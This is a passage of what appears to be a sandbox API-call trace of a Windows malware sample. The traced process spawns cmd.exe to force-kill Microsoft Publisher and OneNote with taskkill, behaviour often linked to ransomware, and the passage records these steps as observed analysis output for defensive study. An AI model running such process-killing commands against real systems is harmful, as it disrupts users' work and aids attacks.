returned 0x134 [0210.007] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0210.007] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0210.007] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0210.007] GetEnvironmentStringsW () returned 0x8ea900* [0210.008] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0210.008] GetCurrentProcess () returned 0xffffffff [0210.008] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124a8340, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124a8340*=0x13c) returned 1 [0210.008] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124a8344, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124a8344*=0x140) returned 1 [0210.008] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124a8348, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124a8348*=0x144) returned 1 [0210.009] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im mspub.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x124b0000, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x13c, hStdOutput=0x140, hStdError=0x144), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im mspub.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x158, hThread=0x154, dwProcessId=0x344, dwThreadId=0x11b8)) returned 1 [0210.060] CloseHandle (hObject=0x154) returned 1 [0210.060] CloseHandle (hObject=0x144) returned 1 [0210.060] CloseHandle (hObject=0x140) returned 1 [0210.060] CloseHandle (hObject=0x13c) returned 1 [0210.060] CloseHandle (hObject=0x130) returned 1 [0210.060] CloseHandle (hObject=0x134) returned 1 [0210.060] CloseHandle (hObject=0x138) returned 1 [0210.060] WaitForSingleObject (hHandle=0x158, dwMilliseconds=0xffffffff) returned 0x0 [0211.596] SetEvent (hEvent=0x150) returned 1 [0211.596] GetExitCodeProcess (in: hProcess=0x158, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0211.596] GetProcessTimes (in: hProcess=0x158, lpCreationTime=0x1249e700, lpExitTime=0x1249e708, lpKernelTime=0x1249e710, lpUserTime=0x1249e718 | out: lpCreationTime=0x1249e700, lpExitTime=0x1249e708, lpKernelTime=0x1249e710, lpUserTime=0x1249e718) returned 1 [0211.597] CloseHandle (hObject=0x158) returned 1 [0211.598] SetEvent (hEvent=0x128) returned 1 [0211.598] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0211.609] SetEvent (hEvent=0x128) returned 1 [0211.632] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1248a5b0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0211.632] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a21e8 | out: lpFileInformation=0x124a21e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0211.633] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0211.633] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x124a2238 | out: lpFileInformation=0x124a2238*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0211.634] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0211.634] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a2288 | out: lpFileInformation=0x124a2288*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0211.634] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0211.634] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x124a22d8 | out: lpFileInformation=0x124a22d8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0211.634] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0211.634] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x124a2328 | out: lpFileInformation=0x124a2328*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0211.634] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0211.634] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x124a2378 | out: lpFileInformation=0x124a2378*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0211.634] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0211.634] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x124a23c8 | out: lpFileInformation=0x124a23c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0211.635] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0211.635] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x124a2418 | out: lpFileInformation=0x124a2418*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0211.635] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0211.635] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x124a2468 | out: lpFileInformation=0x124a2468*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0211.635] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0211.635] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x124a24b8 | out: lpFileInformation=0x124a24b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0211.635] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0211.635] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x124a2508 | out: lpFileInformation=0x124a2508*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0211.635] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0211.636] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x124a2558 | out: lpFileInformation=0x124a2558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0211.636] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0211.636] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x1248a680, nSize=0x64 | out: lpBuffer="") returned 0x63 [0211.636] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a25a8 | out: lpFileInformation=0x124a25a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0211.636] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1248a750, nSize=0x64 | out: lpBuffer="") returned 0x35 [0211.636] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a25f8 | out: lpFileInformation=0x124a25f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0211.636] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0211.637] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0211.637] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0211.637] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0211.638] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0211.638] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0211.638] GetEnvironmentStringsW () returned 0x8ea900* [0211.638] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0211.639] GetCurrentProcess () returned 0xffffffff [0211.639] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x158, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124b8250, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124b8250*=0x130) returned 1 [0211.639] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124b8254, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124b8254*=0x13c) returned 1 [0211.639] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124b8258, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124b8258*=0x140) returned 1 [0211.640] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im onenote.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x124c0000, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x130, hStdOutput=0x13c, hStdError=0x140), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im onenote.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x154, hThread=0x144, dwProcessId=0xe6c, dwThreadId=0xe40)) returned 1 [0211.777] SetEvent (hEvent=0x150) returned 1 [0211.777] CloseHandle (hObject=0x144) returned 1 [0211.777] CloseHandle (hObject=0x140) returned 1 [0211.778] CloseHandle (hObject=0x13c) returned 1 [0211.778] CloseHandle (hObject=0x130) returned 1 [0211.778] CloseHandle (hObject=0x158) returned 1 [0211.778] CloseHandle (hObject=0x138) returned 1 [0211.778] CloseHandle (hObject=0x134) returned 1 [0211.779] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0xffffffff) returned 0x0 [0213.999] SetEvent (hEvent=0x150) returned 1 [0213.999] GetExitCodeProcess (in: hProcess=0x154, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0213.999] GetProcessTimes (in: hProcess=0x154, lpCreationTime=0x124a66e0, lpExitTime=0x124a66e8, lpKernelTime=0x124a66f0, lpUserTime=0x124a66f8 | out: lpCreationTime=0x124a66e0, lpExitTime=0x124a66e8, lpKernelTime=0x124a66f0, lpUserTime=0x124a66f8) returned 1 [0213.999] CloseHandle (hObject=0x154) returned 1 [0214.000] SetEvent (hEvent=0x128) returned 1 [0214.000] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0214.018] SetEvent (hEvent=0x150) returned 1 [0214.018] SetEvent (hEvent=0x128) returned 1 [0214.018] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1247c8f0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0214.019] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12496698 | out: lpFileInformation=0x12496698*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0214.019] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0214.019] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x124966e8 | out: lpFileInformation=0x124966e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0214.020] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0214.020] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x12496738 | out: lpFileInformation=0x12496738*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0214.020] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0214.020] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x12496788 | out: lpFileInformation=0x12496788*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0214.020] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0214.020] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x124967d8 | out: lpFileInformation=0x124967d8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0214.020] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0214.020] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x12496828 | out: lpFileInformation=0x12496828*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0214.021] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0214.021] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x12496878 | out: lpFileInformation=0x12496878*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0214.021] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0214.021] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x124968c8 | out: lpFileInformation=0x124968c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0214.021] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0214.021] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x12496918 | out: lpFileInformation=0x12496918*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0214.021] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0214.021] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), 